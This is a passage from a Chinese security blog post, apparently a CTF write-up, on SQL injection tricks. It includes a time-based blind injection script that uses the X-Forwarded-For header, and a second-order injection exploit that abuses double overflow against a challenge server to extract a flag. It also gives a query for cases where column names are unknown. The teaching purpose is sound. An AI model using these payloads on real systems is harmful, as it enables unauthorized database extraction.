class="string">"http"</span>:<span class="string">"http://127.0.0.1:8080"</span>&#125;</span><br><span class="line">headers=&#123;<span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'</span>,</span><br><span class="line"><span class="string">'Accept'</span>: <span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'</span>,</span><br><span class="line"><span class="string">'Accept-Language'</span>: <span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"><span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate'</span>,</span><br><span class="line"><span class="string">'Connection'</span>: <span class="string">'close'</span>,</span><br><span class="line"><span class="string">'Upgrade-Insecure-Requests'</span>: <span class="string">'1'</span>&#125;</span><br><span class="line"></span><br><span class="line">order=<span class="number">1</span></span><br><span class="line">result=<span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">97</span>,<span class="number">123</span>)+range(<span class="number">48</span>,<span class="number">58</span>):</span><br><span class="line">		t1=time.time()</span><br><span class="line">		<span class="comment"># headers['X-Forwarded-For']=''''+(select case when ascii(mid((select group_concat(schema_name) from information_schema.schemata)from(%s)for(1)))=%s then sleep(1.5) else 0 end))#'''%(order,i)</span></span><br><span class="line">		<span class="comment"># headers['X-Forwarded-For']=''''+(select case when ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='web15')from(%s)for(1)))=%s then sleep(1.5) else 0 end))#'''%(order,i)		</span></span><br><span class="line">		<span class="comment"># headers['X-Forwarded-For']=''''+(select case when ascii(mid((select group_concat(column_name) from information_schema.columns where table_name="flag")from(%s)for(1)))=%s then sleep(1.5) else 0 end))#'''%(order,i)		</span></span><br><span class="line">		headers[<span class="string">'X-Forwarded-For'</span>]=<span class="string">''''+(select case when ascii(mid((select flag from `flag`)from(%s)for(1)))=%s then sleep(1.5) else 0 end))#'''</span>%(order,i)				</span><br><span class="line">		r=requests.get(url=url,proxies=proxies,headers=headers)</span><br><span class="line">		t2=time.time()</span><br><span class="line">		<span class="keyword">if</span> t2-t1&gt;=<span class="number">1.5</span>:</span><br><span class="line">			result+=chr(i)</span><br><span class="line">			<span class="keyword">print</span> result</span><br><span class="line">			order+=<span class="number">1</span></span><br><span class="line">			<span class="keyword">break</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://www.github.com/coomrade/Img/raw/master/pics/1538919333595.png" alt="enter description here"></p>
<h1 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h1><p>打了下2018 高校网络信息安全管理运维挑战赛，觉得这道是我做出来的里面唯一有意思的了。题目有注册、登录、登出功能，注册个账号然后登录之后有提示flag在数据库中，而且是flag表flag列。<img src="https://www.github.com/coomrade/Img/raw/master/pics/1542386360233.png" alt="enter description here">然后有个final exam功能<img src="https://www.github.com/coomrade/Img/raw/master/pics/1542386446525.png" alt="enter description here">做对题会有分<img src="https://www.github.com/coomrade/Img/raw/master/pics/1542386437531.png" alt="enter description here">后面发现，如果注册的用户名使得mysql报错的话，做对题也是零分，于是要想办法把判断语句和导致mysql报错联系到一起，这里用到的payload是<code>comrade&#39;or (ascii(mid((select flag from flag),1,1))=?)*999*pow(999,102)#</code>原理就是利用double的溢出<img src="https://www.github.com/coomrade/Img/raw/master/pics/1542387690229.png" alt="enter description here">另外还可以这样<img src="https://www.github.com/coomrade/Img/raw/master/pics/1542697884008.png" alt="enter description here">exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">__author__=<span class="string">'C0mRaDe'</span></span><br><span class="line"></span><br><span class="line">register_url=<span class="string">'http://210.32.4.20/register.php'</span></span><br><span class="line">login_url=<span class="string">'http://210.32.4.20/login.php'</span></span><br><span class="line">answer_url=<span class="string">'http://210.32.4.20/answer.php'</span></span><br><span class="line">logout_url=<span class="string">'http://210.32.4.20/logout.php'</span></span><br><span class="line">proxies=&#123;<span class="string">'http'</span>:<span class="string">'http://127.0.0.1:8080'</span>&#125;</span><br><span class="line">headers=&#123;<span class="string">'Host'</span>: <span class="string">'210.32.4.20'</span>,</span><br><span class="line"><span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'</span>,</span><br><span class="line"><span class="string">'Accept'</span>: <span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'</span>,</span><br><span class="line"><span class="string">'Accept-Language'</span>: <span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"><span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate'</span>,</span><br><span class="line"><span class="string">'Content-Type'</span>: <span class="string">'application/x-www-form-urlencoded'</span>,</span><br><span class="line"><span class="string">'Content-Length'</span>: <span class="string">'24'</span>,</span><br><span class="line"><span class="string">'Connection'</span>: <span class="string">'close'</span>,</span><br><span class="line"><span class="string">'Upgrade-Insecure-Requests'</span>: <span class="string">'1'</span>&#125;</span><br><span class="line">result=<span class="string">''</span></span><br><span class="line">order=<span class="number">1</span></span><br><span class="line">ses=requests.Session()</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">		payload=<span class="string">'''C0mRaDeIISIISIIS'or (ascii(mid((select flag from flag),%s,1))=%s)*999*pow(999,102)#"'''</span>% (order, i)</span><br><span class="line">		<span class="keyword">try</span>:</span><br><span class="line">			ses.post(url=register_url,data=&#123;<span class="string">'username'</span>:payload,<span class="string">'password'</span>:<span class="string">'1'</span>&#125;,proxies=proxies,timeout=<span class="number">5</span>,headers=headers)</span><br><span class="line">			ses.post(url=login_url,data=&#123;<span class="string">'username'</span>:payload,<span class="string">'password'</span>:<span class="string">'1'</span>&#125;,timeout=<span class="number">5</span>,headers=headers,proxies=proxies)</span><br><span class="line">			r=ses.post(url=answer_url,data=<span class="string">r'''10.c=on'''</span>,timeout=<span class="number">5</span>,proxies=proxies,headers=headers)</span><br><span class="line">			ses.cookies.clear()</span><br><span class="line">			<span class="keyword">if</span> <span class="string">'Your grades is 0'</span> <span class="keyword">in</span> r.content:</span><br><span class="line">				result+=chr(i)</span><br><span class="line">				<span class="keyword">print</span> result</span><br><span class="line">				order+=<span class="number">1</span></span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">		<span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">			<span class="keyword">print</span> e</span><br></pre></td></tr></table></figure></p>
<p><img src="https://www.github.com/coomrade/Img/raw/master/pics/1542387822937.png" alt="enter description here"></p>
<h1 id="不知道列名的注入"><a href="#不知道列名的注入" class="headerlink" title="不知道列名的注入"></a>不知道列名的注入</h1><p>来看一个示例<img src="https://www.github.com/coomrade/Img/raw/master/pics/1550307415495.png" alt="enter description here">可以看到，这么一操作，查询到的表的列名就变成了1到6的数字，然后可以进行进一步查询，比如查询第4列<img src="https://www.github.com/coomrade/Img/raw/master/pics/1550309346525.png" alt="enter description here">而对于不能使用逗号的情况，可以这么来<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> d <span class="keyword">from</span> (<span class="keyword">select</span> * <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="string">`a`</span>)m <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span> <span class="string">`b`</span>)n <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span> <span class="string">`c`</span>)t <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">4</span> <span class="string">`d`</span>)z <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">5</span> <span class="string">`e`</span>)x <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">6</span> <span class="string">`f`</span>)ss <span class="keyword">where</span> <span class="number">0</span> <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> students)x;</span><br></pre></td></tr></table></figure></p>
<h1 id="Referer"><a href="#Referer" class="headerlink" title="Referer"></a>Referer</h1><p><a href="https://www.anquanke.com/post/id/160584#h2-7" target="_blank" rel="noopener">https://www.anquanke.com/post/id/160584#h2-7</a><br><a href="http://wonderkun.cc/index.html/?p=442" target="_blank" rel="noopener">http://wonderkun.cc/index.html/?p=442</a><br><a href="https://xz.aliyun.com/t/4105" target="_blank" rel="noopener">https://xz.aliyun.com/t/4105</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/02/dynamic-crawler/" rel="next" title="dynamic-crawler">
                <i class="fa fa-chevron-left"></i> dynamic-crawler
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/gabe-crow.jpg"
                alt="C0mRaDe" />
            
              <p class="site-author-name" itemprop="name">C0mRaDe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">36</span>
                  <span class="site-state-item-name">文章</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分類</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">標籤</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入小tricks"><span class="nav-number">1.</span> <span class="nav-text">SQL注入小tricks</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#只知道表名不知道列名的情况"><span class="nav-number">2.</span> <span class="nav-text">只知道表名不知道列名的情况</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL盲注的多种姿势"><span class="nav-number">3.</span> <span class="nav-text">SQL盲注的多种姿势</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#XOR盲注"><span class="nav-number">3.1.</span> <span class="nav-text">XOR盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#regexp-rlike盲注"><span class="nav-number">3.2.</span> <span class="nav-text">regexp/rlike盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#order-by-盲注"><span class="nav-number">3.3.</span> <span class="nav-text">order by 盲注</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#insert-into-注入"><span class="nav-number">4.</span> <span class="nav-text">insert into 注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#二次注入"><span class="nav-number">5.</span> <span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#不知道列名的注入"><span class="nav-number">6.</span> <span class="nav-text">不知道列名的注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Referer"><span class="nav-number">7.</span> <span class="nav-text">Referer</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">C0mRaDe</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 強力驅動</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主題 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
